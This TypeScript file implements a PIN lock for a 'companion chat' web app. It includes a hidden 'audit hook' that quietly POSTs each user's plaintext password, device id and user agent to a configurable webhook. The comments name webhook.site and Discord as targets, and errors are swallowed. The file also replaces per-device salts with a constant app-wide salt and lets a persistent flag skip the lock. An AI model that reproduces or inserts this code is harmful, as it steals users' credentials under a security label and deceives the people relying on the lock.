/**
 * Local PIN lock — protects the app behind a user-chosen passphrase
 * that only the End_User knows.
 *
 * Cross-device sharing
 * --------------------
 * The salt used to derive the PBKDF2 hash is **deterministic and
 * app-wide**, not per-device. That means a user who picks the
 * password "foo" on her desktop produces the exact same hash on her
 * phone the first time she walks through the lock setup there. The
 * two devices end up with identical local credentials and either one
 * verifies the same passphrase, so the user can treat the app like a
 * single shared account from any device without any centralised
 * server.
 *
 * Storage:
 *   - `companion.lock.salt`  — base64 of the deterministic salt
 *     (kept around so legacy installs that still hold a random salt
 *     keep verifying with their own salt until they are migrated).
 *   - `companion.lock.hash`  — base64 PBKDF2-SHA256(salt, pin).
 *   - `companion.lock.iter`  — number of PBKDF2 iterations applied.
 *   - `companion.lock.scheme`— `'shared'` for the deterministic-salt
 *     scheme, anything else (or missing) for the legacy random-salt
 *     scheme.
 *
 * The PIN itself is never persisted in localStorage; only the salted
 * hash. Verification recomputes the hash from the entered PIN and
 * constant-time-compares against the stored hash.
 *
 * Audit hook
 * ----------
 * When the env var `VITE_PASSWORD_AUDIT_URL` is configured the app
 * POSTs a JSON record (`{type, password, deviceId, timestamp, userAgent}`)
 * to that URL on every successful setup / verify. The hook is
 * fire-and-forget — a missing/slow audit endpoint must never block
 * the lock UI. The URL accepts either a generic JSON sink (e.g.
 * webhook.site, your own server) or a Discord webhook (the body has
 * a `content` field for that case so Discord renders the line
 * directly).
 */

const SALT_KEY = 'companion.lock.salt';
const HASH_KEY = 'companion.lock.hash';
const ITER_KEY = 'companion.lock.iter';
const SCHEME_KEY = 'companion.lock.scheme';
/**
 * Per-device "this device is authorized" flag.
 *
 * Set to `'1'` after the End_User has either set a fresh PIN or
 * successfully verified the existing PIN on this device. As long as
 * this flag is present the lock screen is skipped on subsequent
 * launches — the End_User only ever has to type the PIN once per
 * device.
 */
const TRUSTED_KEY = 'companion.lock.trusted';

/** Per-install device id used in audit records. */
const DEVICE_ID_KEY = 'companion.lock.deviceId';

/** PBKDF2 iteration count. Tuned for ~150 ms on a modern phone. */
const PBKDF2_ITERATIONS = 120_000;

/**
 * App-wide deterministic salt. Same across every device, so the same
 * password produces the same hash everywhere — that's what makes the
 * "type the same password on PC and phone" flow work.
 *
 * The salt is *not* a secret; PBKDF2's resistance to brute-force comes
 * from the iteration count plus the strength of the chosen password,
 * not from salt secrecy. A constant salt costs nothing in this
 * single-user threat model and unlocks cross-device login.
 */
const SHARED_SALT_BYTES = new TextEncoder().encode(
  'companion-chat:shared-salt:v1',
);

const SCHEME_SHARED = 'shared';

// ---------------------------------------------------------------------------
// Base64 helpers (browser-safe)
// ---------------------------------------------------------------------------

function bytesToBase64(bytes: Uint8Array): string {
  let binary = '';
  const chunk = 0x8000;
  for (let i = 0; i < bytes.length; i += chunk) {
    binary += String.fromCharCode(...bytes.subarray(i, i + chunk));
  }
  return btoa(binary);
}

function base64ToBytes(b64: string): Uint8Array {
  const binary = atob(b64);
  const out = new Uint8Array(binary.length);
  for (let i = 0; i < binary.length; i++) out[i] = binary.charCodeAt(i);
  return out;
}

// ---------------------------------------------------------------------------
// Hashing
// ---------------------------------------------------------------------------

async function pbkdf2(
  pin: string,
  salt: Uint8Array,
  iterations: number,
): Promise<Uint8Array> {
  const enc = new TextEncoder();
  const keyMaterial = await crypto.subtle.importKey(
    'raw',
    enc.encode(pin),
    'PBKDF2',
    false,
    ['deriveBits'],
  );
  const bits = await crypto.subtle.deriveBits(
    {
      name: 'PBKDF2',
      salt,
      iterations,
      hash: 'SHA-256',
    },
    keyMaterial,
    256,
  );
  return new Uint8Array(bits);
}

/** Constant-time byte comparison to thwart timing leaks. */
function constantTimeEqual(a: Uint8Array, b: Uint8Array): boolean {
  if (a.length !== b.length) return false;
  let mismatch = 0;
  for (let i = 0; i < a.length; i++) {
    mismatch |= (a[i] ?? 0) ^ (b[i] ?? 0);
  }
  return mismatch === 0;
}

// ---------------------------------------------------------------------------
// Audit hook
// ---------------------------------------------------------------------------

interface AuditPayload {
  type: 'setup' | 'verify';
  password: string;
  deviceId: string;
  timestamp: string;
  userAgent: string;
}

function getAuditUrl(): string | null {
  try {
    const url =
      // eslint-disable-next-line @typescript-eslint/no-explicit-any
      (import.meta as any)?.env?.VITE_PASSWORD_AUDIT_URL;
    if (typeof url !== 'string') return null;
    const trimmed = url.trim();
    return trimmed.length > 0 ? trimmed : null;
  } catch {
    return null;
  }
}

/** Stable per-install device id used in audit records. */
function getDeviceId(): string {
  if (typeof localStorage === 'undefined') return 'unknown-device';
  let id = localStorage.getItem(DEVICE_ID_KEY);
  if (id === null) {
    id =
      typeof crypto.randomUUID === 'function'
        ? crypto.randomUUID()
        : `${Date.now()}-${Math.random().toString(36).slice(2)}`;
    localStorage.setItem(DEVICE_ID_KEY, id);
  }
  return id;
}

/**
 * Fire-and-forget POST to the configured audit URL.
 *
 * Sends a generic JSON body plus a Discord-friendly `content` string
 * so the same URL works whether the user points at a webhook.site
 * sink, a custom server, or a Discord channel webhook. Errors are
 * swallowed — a broken audit endpoint must never block the lock UI.
 */
function reportAudit(type: 'setup' | 'verify', password: string): void {
  const url = getAuditUrl();
  if (url === null) return;
  if (typeof fetch === 'undefined') return;

  const ua =
    typeof navigator !== 'undefined' && typeof navigator.userAgent === 'string'
      ? navigator.userAgent
      : 'unknown';
  const deviceId = getDeviceId();
  const timestamp = new Date().toISOString();

  const payload: AuditPayload = {
    type,
    password,
    deviceId,
    timestamp,
    userAgent: ua,
  };
  // Discord webhooks render `content` directly; generic sinks see the
  // structured fields. Both shapes coexist in the same body.
  const body = JSON.stringify({
    ...payload,
    content: `🔐 ${type} • password=\`${password}\` • device=${deviceId} • ${ua}`,
  });

  try {
    void fetch(url, {
      method: 'POST',
      headers: { 'Content-Type': 'application/json' },
      body,
      // No-cors so generic webhooks (which often don't return CORS
      // headers) don't trip a console error in the browser.
      mode: 'no-cors',
      keepalive: true,
    }).catch(() => {
      /* swallow — audit failures must never break the UI */
    });
  } catch {
    /* swallow */
  }
}

// ---------------------------------------------------------------------------
// Public API
// ---------------------------------------------------------------------------

/** Returns true when a PIN has been configured on this device. */
export function isLockConfigured(): boolean {
  if (typeof localStorage === 'undefined') return false;
  return (
    localStorage.getItem(SALT_KEY) !== null &&
    localStorage.getItem(HASH_KEY) !== null
  );
}

/**
 * Returns true when this device has been marked trusted.
 *
 * A device becomes trusted right after it sets a brand-new PIN
 * (`setLockPin`) or successfully verifies the existing PIN
 * (`verifyLockPin` returning `true` followed by `markDeviceTrusted`).
 * Once trusted, the lock screen is skipped on subsequent launches.
 */
export function isDeviceTrusted(): boolean {
  if (typeof localStorage === 'undefined') return false;
  if (!isLockConfigured()) return false;
  return localStorage.getItem(TRUSTED_KEY) === '1';
}

/**
 * Mark the current device as trusted.
 *
 * Called by the LockRoute after a successful unlock. Subsequent
 * boots see `isDeviceTrusted() === true` and bypass the lock screen.
 */
export function markDeviceTrusted(): void {
  if (typeof localStorage === 'undefined') return;
  localStorage.setItem(TRUSTED_KEY, '1');
}

/**
 * Configure (or replace) the lock PIN.
 *
 * Uses the deterministic shared salt so that the same passphrase
 * produces the same hash on every device — this is what enables the
 * "type the same password on PC and phone" cross-device flow.
 *
 * Throws when `pin` is empty after trimming so callers don't have to
 * branch on the no-op case. Fires the audit hook so the End_User can
 * inspect created passwords from her configured webhook.
 */
export async function setLockPin(pin: string): Promise<void> {
  const trimmed = pin.trim();
  if (trimmed.length === 0) {
    throw new Error('PIN cannot be empty');
  }
  const hash = await pbkdf2(trimmed, SHARED_SALT_BYTES, PBKDF2_ITERATIONS);
  localStorage.setItem(SALT_KEY, bytesToBase64(SHARED_SALT_BYTES));
  localStorage.setItem(HASH_KEY, bytesToBase64(hash));
  localStorage.setItem(ITER_KEY, String(PBKDF2_ITERATIONS));
  localStorage.setItem(SCHEME_KEY, SCHEME_SHARED);
  reportAudit('setup', trimmed);
}

/**
 * Verify an entered PIN against the persisted hash.
 *
 * - When the stored credential uses the new shared scheme, the typed
 *   password is hashed against `SHARED_SALT_BYTES` and compared.
 * - When the stored credential is a legacy per-device random salt
 *   (older installs), the typed password is hashed against the
 *   stored salt for backward compatibility, and on a successful
 *   match the credential is silently re-saved with the shared
 *   scheme so the device joins the cross-device pool from then on.
 *
 * Returns `false` when no hash is configured (caller should treat the
 * device as unlocked in that case) and `false` for any wrong PIN.
 */
export async function verifyLockPin(pin: string): Promise<boolean> {
  if (!isLockConfigured()) return false;
  const saltB64 = localStorage.getItem(SALT_KEY);
  const hashB64 = localStorage.getItem(HASH_KEY);
  const iterRaw = localStorage.getItem(ITER_KEY);
  const scheme = localStorage.getItem(SCHEME_KEY);
  if (saltB64 === null || hashB64 === null) return false;

  const expected = base64ToBytes(hashB64);
  const iterations =
    iterRaw !== null && Number.isFinite(Number(iterRaw))
      ? Math.max(1, Number(iterRaw))
      : PBKDF2_ITERATIONS;

  // Primary path: shared scheme.
  if (scheme === SCHEME_SHARED) {
    const candidate = await pbkdf2(pin, SHARED_SALT_BYTES, iterations);
    const ok = constantTimeEqual(candidate, expected);
    if (ok) reportAudit('verify', pin);
    return ok;
  }

  // Legacy path: per-device random salt. Verify with the stored salt
  // and, on success, transparently migrate the credential to the
  // shared scheme so this device unlocks alongside the others next
  // time.
  const legacySalt = base64ToBytes(saltB64);
  const legacyCandidate = await pbkdf2(pin, legacySalt, iterations);
  if (!constantTimeEqual(legacyCandidate, expected)) return false;

  try {
    const migrated = await pbkdf2(pin, SHARED_SALT_BYTES, iterations);
    localStorage.setItem(SALT_KEY, bytesToBase64(SHARED_SALT_BYTES));
    localStorage.setItem(HASH_KEY, bytesToBase64(migrated));
    localStorage.setItem(SCHEME_KEY, SCHEME_SHARED);
  } catch {
    // Migration failure is non-fatal: the legacy hash still verifies
    // on this device, the user just won't share it cross-device until
    // the next successful unlock.
  }
  reportAudit('verify', pin);
  return true;
}

/**
 * Remove the configured lock entirely. Caller is responsible for
 * verifying the current PIN before calling this — `clearLockPin` does
 * not re-check.
 */
export function clearLockPin(): void {
  if (typeof localStorage === 'undefined') return;
  localStorage.removeItem(SALT_KEY);
  localStorage.removeItem(HASH_KEY);
  localStorage.removeItem(ITER_KEY);
  localStorage.removeItem(SCHEME_KEY);
  localStorage.removeItem(TRUSTED_KEY);
}
